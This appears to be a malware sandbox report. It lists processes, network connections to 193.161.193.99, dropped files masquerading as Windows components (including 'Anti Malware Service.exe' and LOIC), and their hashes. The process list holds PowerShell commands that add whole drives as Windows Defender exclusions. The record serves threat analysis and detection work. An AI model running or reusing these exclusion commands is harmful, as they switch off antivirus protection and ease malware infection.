C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
"C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
C:\Windows\SYSTEM32\rundll32.exe
rundll32
Network
| Country | Destination | Domain | Proto |
| DE | 193.161.193.99:21265 | tcp | |
| DE | 193.161.193.99:52695 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| DE | 193.161.193.99:21265 | tcp | |
| N/A | 127.0.0.1:3334 | tcp | |
| DE | 193.161.193.99:21265 | tcp |
Files
memory/1780-0-0x00007FF8B0ED3000-0x00007FF8B0ED5000-memory.dmp
memory/1780-1-0x0000000000630000-0x0000000000AEE000-memory.dmp
C:\Users\Admin\AppData\Local\LOlC.exe
| MD5 | e6b7d05c7a4369dd9112959795bb3521 |
| SHA1 | 80c60595def3cbb2d126e3c86c9a1b92572b55b7 |
| SHA256 | 10eb620d956a63295cd933a3bad5769b1f8b0eec8b3748569467c82fb61e295c |
| SHA512 | baa982104c839f9f0893dc2940b418fc64fcc9e964a2791c176f7e7795ee7732429287d84f5d37bea15882a6462eaa7f7996bf283a27a0718ee96054a396a806 |
C:\Users\Admin\AppData\Local\Runtime Broker.exe
| MD5 | 9c3ad681c33d3fb6934102a35cb7a2ad |
| SHA1 | d3630943b6af7b956eb459fc2e8f5137f2f5f8a1 |
| SHA256 | 9625d7f8c8ddded4818a03ec7912c0df6ce464a95eb055b01a15fe3aa373305b |
| SHA512 | ea310b840455b8279c72ccb8e45f27b6ec861baf66d223b584d790bdca6426b54729eb7c80163c8e6ce1e88044088c1167109be0cb9418935d70ef42a6bbd466 |
memory/4908-31-0x00000000005F0000-0x0000000000606000-memory.dmp
C:\Users\Admin\AppData\Local\LOIC.exe
| MD5 | e6fa3028cd03318496852718143d256f |
| SHA1 | 4c85973d612cd1955163c244c9c334d3a0c507cb |
| SHA256 | f60a52512773b52def9ba9ce8aad61144d2cf351f6bc04d1c5a13abef8f3b89b |
| SHA512 | 29089eccd1e670570fecafdd682f0ec13bc55fb17cdc0938ff4c6fd32c55c1919e26fad5b3ffed78217a94a9e8aba768cdf092ffc85f6ab19fbede0dc0fae0bb |
memory/1596-37-0x0000000000120000-0x0000000000148000-memory.dmp
memory/4908-38-0x00007FF8B0ED0000-0x00007FF8B1991000-memory.dmp
memory/4196-41-0x0000012357680000-0x00000123576A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5vyfptr.fr5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb1ad317bd25b55b2bbdce8a28a74a94 |
| SHA1 | 98a3978be4d10d62e7411946474579ee5bdc5ea6 |
| SHA256 | 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98 |
| SHA512 | d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f18cdd5d9abaa5ed52be8004a11dc037 |
| SHA1 | 9ba656b97d13da0d686e8757d9eaeaf735675826 |
| SHA256 | 53b358ebb88b3f7adcf45de224a5f9fbfb7d98c7c650afe61a4fc8e1bcc16dfb |
| SHA512 | c4a771038ac2d0360d7318168a6f785db0bd1884abd0a6993b974536d0681dbef5e2df39cf781f5fbf4264a9d294bb6b905931d840289af7b81066cc8ba86a7e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2c8179aaa149c0b9791b73ce44c04d1 |
| SHA1 | 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff |
| SHA256 | c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a |
| SHA512 | 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3 |
C:\Users\Admin\AppData\Local\Temp\tmp5FC3.tmp.bat
| MD5 | eb0f989e9608506b93f72fd01122de06 |
| SHA1 | 1af35cf9188f425942c28a7350a184ff707dcb55 |
| SHA256 | b6cff43976835e2d865f31791373452d7898b82c80086e03dbb75473dbc30aad |
| SHA512 | b26d96fc46bcf2fffb937e1c1075dfe073675123eb6e732d4e90a6fd276f0bcf4354d0fc53b4b0e0d80eb573cc316a3851e0d70cadae74303d405d6b87d4f4ea |
memory/4908-103-0x00007FF8B0ED0000-0x00007FF8B1991000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71f0e090d65b6fefff8889d5819e2b41 |
| SHA1 | 88c8d0b5e28cce1741072a55d2ef8263733fde63 |
| SHA256 | 4a06b1ccf7ebbdd4e83a7df9d851fd42bccf25ed2c54a43039cd4d797ad7cd1d |
| SHA512 | 62357a39111a6f41f694f23ea12f69ba62ec3cf865680527a5631cb3a3bc7ba19ce7ad1a493af5001fe44bb7a2bfa5b7feaa5d9b5882ed3c33b5dcf93572d3f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a7cc007980e419d553568a106210549a |
| SHA1 | c03099706b75071f36c3962fcc60a22f197711e0 |
| SHA256 | a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165 |
| SHA512 | b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e70d51b7df8fa37bc73c0e70b4e82d34 |
| SHA1 | b342ac333afab91ec92ce0ab690f17e43d87d661 |
| SHA256 | 1bd613817d479000e6e248c022b3521a8d64484b0e755ded0a2d043c32945730 |
| SHA512 | 6cd05079ba29b479347cac367987c12e97cdb78f547ac3f95f5e84575e7df2bbe4f721fa3c9cda48fb7194f7f765cdbd3898b4c3b9fe646d90549ec726f1cff8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 919d9e239eac75091ddcacd2697a8de5 |
| SHA1 | e22b8bc440a99c72b1fae6ee14086093c302d94b |
| SHA256 | c5a5f01b328c5cf7fa6bd4c5c09301a7f280ab70e223c1d1a40d2857ff5c5e12 |
| SHA512 | 9c1a25a4708d76d805d71c809fd9aa5e9c511b414c9139bf7cea1bfcf75d3b27d57cfcc6d795238bc00755f79b177470fe1a68e77f8ea71134000712aef0d7d3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 04f1d68afbed6b13399edfae1e9b1472 |
| SHA1 | 8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0 |
| SHA256 | f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de |
| SHA512 | 30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2524e72b0573fa94e9cb8089728a4b47 |
| SHA1 | 3d5c4dfd6e7632153e687ee866f8ecc70730a0f1 |
| SHA256 | fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747 |
| SHA512 | 99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a4db2a8eea384d533ccbb985ee5f9ae4 |
| SHA1 | 6e02b9040fb183935ad9b7d5c275a38dedd8bbcb |
| SHA256 | 46addd3ed52002f573e9e13c1f177e50e6067f9f4987e64e18bb0733044e46af |
| SHA512 | 0a1ba4809aed0a7965875c7a56fccf9c715ff7d7c6b570b7b19dde498ed765d7c61a48e6fb53cf9577415933ce0974c17a820660829b1a4f11851b912ead1f4e |
C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
| MD5 | 1837aea22a774bde2cd2eca02b5995a0 |
| SHA1 | c00b11f612716a5b9f282264538ddc2e041d8981 |
| SHA256 | 3263283f59723e5487b128439d495da10b06f84a84793da717a35e0dd7e3b905 |
| SHA512 | 9f479883cae36152dd2d2bf55e35d2ab05783e214479d12b957d316e4d3c16b63d9dfaf11f3752f9831c182f7c4b06261849042999bac4544fed4011c9fad67b |
memory/4712-342-0x0000020062720000-0x0000020062721000-memory.dmp
memory/908-343-0x00007FF694360000-0x00007FF6947E7000-memory.dmp
memory/2072-344-0x00007FF795DE0000-0x00007FF795ECB000-memory.dmp